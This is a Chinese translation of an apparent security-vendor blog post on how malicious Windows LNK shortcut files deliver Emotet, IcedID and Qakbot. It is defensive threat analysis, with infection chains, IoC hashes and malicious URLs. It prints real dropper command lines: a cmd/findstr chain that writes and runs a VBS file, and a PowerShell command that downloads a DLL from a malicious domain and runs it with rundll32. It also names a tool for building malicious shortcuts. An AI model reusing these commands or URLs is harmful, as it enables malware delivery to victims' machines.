LNK(快捷方式文件)恶意软件的兴起

LNK 文件是一个 Windows 快捷方式,用作打开文件、文件夹或应用程序的指针。LNK 文件基于 Shell Link 二进制文件格式,其中包含用于访问另一个数据对象的信息。这些文件可以使用标准的右键单击创建快捷方式选项手动创建,或者有时在运行应用程序时自动创建。
也有许多工具可用于构建 LNK 文件,也有许多人专门为恶意目的构建了“lnkbombs”工具(基于Python,免费)。
在 2022 年第二季度,McAfee Labs 发现使用 LNK 文件传递的恶意软件有所增加。攻击者正在利用 LNK 的易用性,并使用它来传播 Emotet、Qakbot、IcedID、Bazarloaders 等恶意软件:
22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图1
图 1:4 月至 5 月 LNK 攻击的地理位置
在本博客中,我们将了解如何使用 LNK 文件来传播 Emotet、Qakbot 和 IcedID 等恶意软件。
下面是这些快捷方式文件在普通用户眼中的截图:
22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图2
图 2:普通用户看到的 LNK 文件

LNK 威胁分析和活动

随着微软默认禁用 Office 宏,恶意软件参与者现在正在增强他们的诱饵技术,包括利用 LNK 文件来实现他们的目标。
威胁参与者正在使用垃圾邮件和恶意 URL 将 LNK 文件传递给受害者。这些文件指示 PowerShell、CMD 和 MSHTA 等合法应用程序下载恶意文件。
我们将通过最近的三个恶意软件活动 Emotet、IcedID 和 Qakbot 来了解这些文件的危险程度。

EMOTET

感染链

22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图3
图 3:Emotet 通过 LNK 文件 Infection-Chain 传递

威胁分析

22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图4
图 4: 收到的带有恶意 LNK 的电子邮件用户
在图 4 中,我们可以看到诱饵消息和附加的恶意 LNK 文件。
用户通过手动访问附加的 LNK 文件被感染。为了更深入地挖掘,我们看到了 LNK 文件的属性:
22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图5
图 5:Emotet LNK 示例的属性
如图 5 所示,目标部分显示 LNK 调用 Windows 命令处理器 (cmd.exe)。在属性中看到的目标路径仅对 255 个字符可见。但是,命令行参数最多可达 4096 个,因此恶意行为者可以利用这一优势并传递长参数,因为它们在属性中不可见。
在我们的例子中,参数是 /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”:
22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图6
图 6: Emotet LNK 文件的内容
一旦 findstr.exe 实用程序接收到提到的字符串,LNK 文件的其余内容将保存在 %temp% 文件夹下的 .VBS 文件中,随机名称为 YIScZcZKeP.vbs
cmd.exe 命令的下一部分使用 Windows 脚本主机 (wscript.exe) 调用 VBS 文件以下载主要的 Emotet 64 位 DLL 有效负载。
然后最终使用 REGSVR32.EXE 实用程序执行下载的 DLL,该实用程序与基于 excel(.xls) 的Emotet符号版本类似。

ICEDID

感染链

22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图7
图 7: IcedID 通过 LNK 文件 Infection-Chain 传递

威胁分析

此攻击是攻击者如何链接 LNK、PowerShell 和 MSHTA 实用程序以攻击其受害者的完美示例。
在这里,PowerShell LNK 有一个高度混淆的参数,可以在图 8 中看到 LNK 属性的目标部分:
22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图8
图 8: IcedID LNK 样本的属性
该参数异常长,在目标部分中不完全可见。整个混淆参数在运行时被解密,然后使用参数 https://hectorcalle.com/093789.hta 执行 MSHTA。
下载的 HTA 文件调用另一个具有类似混淆参数的 PowerShell,但这会连接到 Uri:

Uri 下载 IcedID 安装程序 64 位 EXE 有效负载到%HOME% 文件夹下。

QAKBOT

感染链

22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图9
图 9: Qakbot 通过 LNK 文件 Infection-Chain 交付

威胁分析

这次攻击将向我们展示攻击者如何直接硬编码恶意 URL 以与 PowerShell 等实用程序一起运行并下载主要威胁有效载荷:
22.06.21-McAFee - LNK(快捷方式文件)恶意软件的兴起 - 图10
图 10: Qakbot LNK 样本的属性
在图 10 中,完整的目标部分参数是“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri https://news-wellness.com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”。
调用此 PowerShell LNK 时,它使用 Invoke-WebRequest 命令连接到 https://news-wellness.com/5MVhfo8BnDub/D.png,下载文件保存在 %temp% 文件夹下名为 test.dll 的。
这是主要的 Qakbot DLL 有效负载,然后使用 rundll32 实用程序执行。

结论

正如我们在上述三个威胁活动中看到的那样,可以理解攻击者滥用 Windows 快捷方式 LNK 文件并使它们对普通用户极为危险。LNK 与 PowerShell、CMD、MSHTA 等结合使用,会对受害者的机器造成严重损害。恶意 LNK 通常使用 PowerShell 和 CMD 连接到恶意 URL 以下载恶意负载。
我们在这里只介绍了三个威胁系列,但已经看到这些文件使用其他 Windows 实用程序来传递各种类型的恶意负载。这些类型的攻击仍在不断发展,因此每个用户在使用 LNK 快捷方式文件时都必须进行彻底的检查。消费者必须保持他们的操作系统和防病毒软件是最新的。他们应该提防网络钓鱼邮件和点击恶意链接和附件。

IoCs

类型 SHA-256 扫描器
Emotet LNK 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 WSS LNK/Emotet-FSE
IcedID LNK 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 WSS LNK/Agent-FTA
Suspicious ZIP!lnk
Qakbot LNK b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172 WSS LNK/Agent-TSR

URL

https://creemo.pl/wp-admin/ZKS1DCDQUT4Bb8Kb
http://filmmogzivota.rs/SpryAssets/gDR
http: //demo34.ckg . hk/service/hhMZrfC7Mnm9JD
http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv
http://cipro.mx/press/siZP69rBFmibDvuTP1
https://hectorcalle.com/093789.hta
https://hectorcalle.com/listbul.exe
https://green-a-thon.com/LosZkUvr/B.png

笔记

lnkbombs

dievus/lnkbomb